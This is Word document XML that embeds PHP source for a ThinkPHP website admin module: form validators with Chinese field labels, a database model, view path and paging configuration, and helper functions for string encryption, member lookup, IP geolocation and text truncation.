          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>流通量</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'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DDD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'total_circulation|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发行量</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'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A17D7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AC90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A39EA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AE2EE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namespace app\admin\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE85A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12ED1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Category extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA53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A454D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2FCDD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>菜单名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w: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=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require|max:50',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07105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'tid|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示位置</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183644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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>菜单排序</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E2A8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5B8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6F55C0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app\admin\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4B1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5FD1B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Admin extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C970E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A1BB9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3499E1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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>权限</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5EAD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁用</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612EB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785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79206A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app\admin\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA9DB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6E63D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Platform extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EFD0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615B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5B515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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w: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=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD25D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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否隐藏</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535FB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'score|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评级</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'require|number|between:1,5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9FF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43A6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F455B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72C862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app\admin\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F4B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24A41A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Member extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E2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CB337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4257E6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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                         =&gt;      'max:200|alphaDash',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412074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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w: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=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1534A4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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>昵称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                     =&gt;      'max:200',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8D96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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>余额</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'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E49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'score|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>积分</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                        =&gt;      'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED7B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'jingyan|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经验值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                    =&gt;      'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DADC2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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                     =&gt;      'min:6'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E0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071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92CA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app\admin\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E5C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507B63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Typeid extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC4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3FCF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4B3E61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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栏目名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w: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 xml:space="preserve">    =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3337A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否隐藏</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797570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'tid|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>菜单排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                      =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295FFA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1144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B6E1F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app\admin\model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB8F9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think\Model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05581A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Typeid extends Model{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFEF1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protected $name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'typeid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127566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protected $auto </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE5D7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protected $insert </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5880AD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protected function setCreatetimeAttr(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E4C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return time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1765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05A02F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protected function setUpdatetimeAttr(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44D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return time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04120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42736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FFE36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6718F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3D89C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'view_replace_str'  =&gt;  [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C01A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'__PUBLIC__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D45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t>'__STYLE__'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'/public/style/admin/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B49F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 xml:space="preserve">    '__CSS__'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'/public/style/admin/css/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565856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'__JS__'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xml:space="preserve">'/public/style/admin/js/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA8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'__IMG__'</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xml:space="preserve">'/public/style/admin/img/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47918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'__PLUGINS__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">'/public/style/admin/plugins/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3606F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'__IMAGES__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/uploads/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EB9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'__IMGERROE__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/style/admin/img/images.jpg',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE46D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395572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'adminClass'</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1912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'main'</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animated fadeInRight',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0F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'top'</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B84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'left'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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9E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'right'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   ',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31465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72FB1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'appkey'</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2585CC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'ip'</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'51601367eff4ff5de64633ff127b75e8'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19102B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1C637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'paginate'               =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E350D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'bootstrap',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F2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'var_page'  =&gt; 'page',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B43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'list_rows' =&gt; 20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C7D9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DE1F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'url_route_on'           =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C02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38120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BB8E4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5F27B8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11ED23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app\api\model\Send; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516B44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_cache($name=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B204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if($name=='db'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A6F1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5F94E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ECFC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35CD6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_encrypt($string, $operation = 'E', $key = '|www.ffxiang.cn|')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B95AD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82343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md5($key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE00B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$key_length = strlen($key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1EE9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 = $operation == 'D' ? base64_decode($string) : substr(md5($string . $key), 0, 8) . $string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E38F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$string_length = strlen($string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF5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$rndkey = $box = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE84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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF81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 ($i = 0; $i &lt;= 255; $i ++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F51B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$rndkey[$i] = ord($key[$i % $key_length]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D3A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$box[$i] = $i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55634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DCF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 ($j = $i = 0; $i &lt; 256; $i ++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B3B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 = ($j + $box[$i] + $rndkey[$i]) % 256;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CAC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$tmp = $box[$i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6EE1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$box[$i] = $box[$j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD5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$box[$j] = $tmp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147F37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72F7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 ($a = $j = $i = 0; $i &lt; $string_length; $i ++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289790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($a + 1) % 256;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598548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 = ($j + $box[$a]) % 256;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692832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$tmp = $box[$a];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4613B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$box[$a] = $box[$j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDEB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$box[$j] = $tmp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647AF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chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071842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BE79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($operation == 'D') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E51F3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(substr($result, 0, 8) == substr(md5(substr($result, 8) . $key), 0, 8)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F552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substr($result, 8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36765C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5B4BB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318070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5A48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D995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str_replace('=', '', base64_encode($result));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC78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EC5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A849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_decrypt($text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B20F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BD15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(!$text) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7CA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797E0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9474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_encrypt($text, 'D');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213E7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explode('|www.ffxiang.cn|', $text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75159D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(!isset($text[1])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948C8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58536B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4DF6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abs($text[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31073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$text[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B1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(!$password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4628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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409EAA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F46D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&amp;&amp; $password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FF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Db::name('member')-&gt;where(['id' =&gt; $id, 'password' =&gt; $password, 'hide' =&gt; 1])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35044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 $id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F459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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA9B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0EB2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47630D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10E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99AE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35B0B2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ACB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A7DC0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_ip($ip=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546B2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if(!$ip){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449D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$ip=request()-&gt;ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCEE1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BF4D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$ips=file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD6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$ips=json_decode($ips,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E90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if($ips){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC75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$ip=$ips['region'].$ips['city'].','.$ips['ip'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178F3A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CBC5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未知</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,'.$ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC5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F79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$ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0189F9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5330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_img($img){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD83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68A06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$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C28B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1649B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$data='/public/style/index/img/images.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA14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DCD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057B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F7AC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_substr($title,$length=20,$dian='...'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A0D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if(mb_strlen($title) &lt;= $length){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C3E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$title;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738B9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63AF0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mb_substr($title,0,$length,'utf-8').$dian;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2206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66F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C2A4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CBBE5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_tongjiField($name,$where,$addDel=1,$field='tongji',$int=1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F605C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if($addDel==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC014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$db=Db::name($name)-&gt;where($where)-&gt;setInc($field,$int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF6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5BFBA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$db=Db::name($name)-&gt;where($where)-&gt;setDec($field,$int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37697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7590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 ? 1 : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E5C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6A440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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265936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_mychannelName($id,$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A17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D843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$db=Db::name('mychannel')-&gt;where('id',$id)-&gt;cache(_cache('db'))-&gt;value($name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541300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811B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5A24D9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A92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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB3C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BA479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6FC80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86F35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D6DD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_typeid($id='',$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AACD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if($name=='url'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642B34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$url=url('typeid',['id'=&gt;$id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C0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$url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F964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4722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$db=Db::name('typeid')-&gt;where(['id'=&gt;$id])-&gt;cache(_cache('db'))-&gt;value($name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F19E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B545F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED126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C6E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2532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_typeidTid($arr,$tid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACAA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w:t>
      </w:r>
    </w:p>
